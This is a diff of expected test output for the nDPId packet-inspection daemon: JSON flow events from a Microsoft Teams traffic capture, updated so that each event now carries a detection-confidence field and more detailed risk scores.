 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
